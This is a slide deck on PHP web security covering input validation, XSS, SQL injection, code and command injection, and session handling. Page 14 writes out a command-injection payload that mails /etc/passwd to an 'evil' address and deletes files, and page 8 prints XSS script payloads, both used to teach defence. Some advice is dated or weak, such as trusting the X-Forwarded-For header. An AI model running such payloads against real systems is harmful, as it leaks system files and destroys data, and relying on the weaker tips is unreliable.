Php security

PHP Security by Uttam Kumar Email:- [email protected] Mobile:- 8149253187


Page 1: Php security

PHP Security

by

Uttam Kumar

Email:- [email protected]

Mobile:- 8149253187

Page 2: Php security

What is Security?

measurement…

safety…

protection…

Page 3: Php security

Secure Web Applications

web security issues have to do with:

– hacker attacks

• denial of service

• server hijacking

– common threats

– compromise of data

Page 4: Php security

PHP & Security

a growing language…

a major concern…

Page 5: Php security

Never trust the web…

Input data validation

– register_globals = OFF

– $_REQUEST[] big NO NO …

– type casting input data

• No is_numeric() if data is numeric [locale problem]

• regular expression if data is a string

– Path validation

• Always use basename()

Page 6: Php security

Never trust the web…

• Content size validation

– use server-side max length validation

– File Upload

• Check destination file size with $_FILES['name']['size']

• I think the browser MIME header is reliable, right?

– Use getimagesize() in case of an image

• External source upload like an avatar

– Make a local copy if path/of/file is submitted from a URL.

Page 7: Php security

XSS attack

– Can lead to embarrassment.

– Session take-over.

– Password theft.

– User tracking by 3rd parties

Page 8: Php security

XSS attack

Prevention is better than cure

– Use strip_tags()

• No tag allowance please

– Use htmlentities()

– Is $_SERVER safe ?

• Can be set…

• Php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo

• $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo

• $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo

– IP based info

• Use HTTP_X_FORWARDED_FOR

• Use long2ip()

– $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);

– $iIp = ip2long(trim(array_pop($aIp))); // false when the last entry is not a dotted IPv4 address

– $sValidIp = ($iIp === false) ? '' : long2ip($iIp);

Page 9: Php security

SQL Injection


– Arbitrary query execution

– Removal of data.

– Modification of existing values.

– Denial of service.

– Arbitrary data injection.

Page 10: Php security

Preventing SQL injection

• Are magic quotes enough?

– use mysql_real_escape_string()

– use prepared statements

– avoid omitting single quotes

– LIKE quandary needs addslashes()

– avoid printing the query

– Authentication data storage

• Encrypt sensitive data used to access the database

• Make sure it's only loaded for certain VirtualHosts

Page 11: Php security

Authentication Data Storage

/home/illa/sql.conf (Apache server configuration):

SetEnv DB_LOGIN "login"
SetEnv DB_PASSWD "password"
SetEnv DB_HOST "127.0.0.7"

<VirtualHost iila.ws>
    Include /home/illa/sql.conf
</VirtualHost>

PHP file:

$_SERVER['DB_LOGIN']
$_SERVER['DB_PASSWD']

A better approach is to set these things under PHP's ini directives instead, e.g. php_admin_value mysql.default_user "login"

Page 12: Php security

Preventing code injection

– Path validation

– Validate fileName

$sFile = "D\\'sozaRes.doc"; // the literal string D\'sozaRes.doc, i.e. the name contains a backslash

basename($sFile); // returns D\'sozaRes.doc on a *nix system
basename($sFile); // returns 'sozaRes.doc on win32, where the backslash is a directory separator

• Remove slashes

• Keep a white list of file names

• Use the full path

– Avoid variables in eval()

– Avoid using variables passed by users in a regEx.
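The checks from the file-upload slide (page 6) and the path-validation points above, combined into one server-side validator. This is an added example, not code from the deck; the $_FILES entry layout is PHP's own, while the size limit, the allowed image types, the character whitelist and the "avatar" field name are assumptions.

```php
<?php
// Added example (not from the slides): validate one entry of $_FILES for an
// image upload. Size comes from the server-side $_FILES data, the browser's
// MIME header ($upload['type']) is ignored, getimagesize() confirms the bytes,
// and the stored name is rebuilt from basename() plus a whitelist.
// $maxBytes and the allowed types are assumed limits, not from the deck.
function validateImageUpload(array $upload, int $maxBytes = 512000): ?string
{
    // Anything PHP itself flagged (partial upload, over the ini limit, ...) is rejected.
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Server-side max length check; the form's MAX_FILE_SIZE field is client data.
    if ($upload['size'] <= 0 || $upload['size'] > $maxBytes) {
        return null;
    }
    // Only accept the temporary file PHP created, not a path the client named.
    if (!is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    // getimagesize() returns false when the content is not an image, whatever
    // Content-Type the browser claimed.
    $info = @getimagesize($upload['tmp_name']);
    if ($info === false) {
        return null;
    }
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    if (!isset($allowed[$info[2]])) {
        return null;
    }
    // Path validation: basename() on *nix keeps backslashes (see the
    // D\'sozaRes.doc example), so normalise them first, then whitelist characters.
    $name = basename(str_replace('\\', '/', $upload['name']));
    $name = preg_replace('/[^A-Za-z0-9_-]/', '', pathinfo($name, PATHINFO_FILENAME));
    if ($name === '') {
        $name = 'upload';
    }
    // The extension follows the detected type, never the client-supplied name.
    return substr($name, 0, 64) . '.' . $allowed[$info[2]];
}

// Usage with a real upload (field name "avatar" is assumed):
// $safe = validateImageUpload($_FILES['avatar']);
// if ($safe !== null) {
//     move_uploaded_file($_FILES['avatar']['tmp_name'], '/var/www/uploads/' . $safe);
// }
```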

Page 13: Php security

Command injection

– Use escapeshellcmd() and escapeshellarg()

– Use the full path for the command

– Set priority and memory limit for the command

• shell_exec("ulimit -t 20 -m 20000; /usr/bin/php test.php");

Page 14: Php security

Calling External Programs

<?php $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w'); ?>

The user could control $to to yield:

http://examp.com/send.php?to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A

which would result in running the command:

/usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *

a solution would be:

$fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');

Page 15: Php security

Securing sessions

• Weakness of session

– Server side weakness…

• ls -l /tmp/sess_* // can reveal session info

– URL session exploitation

• Solution

– Native protection.

– Mixing security and convenience.

– Securing session storage path

– Check browser signature

– Referrer validation

Page 16: Php security

Questions…????

Page 17: Php security

Thank You !!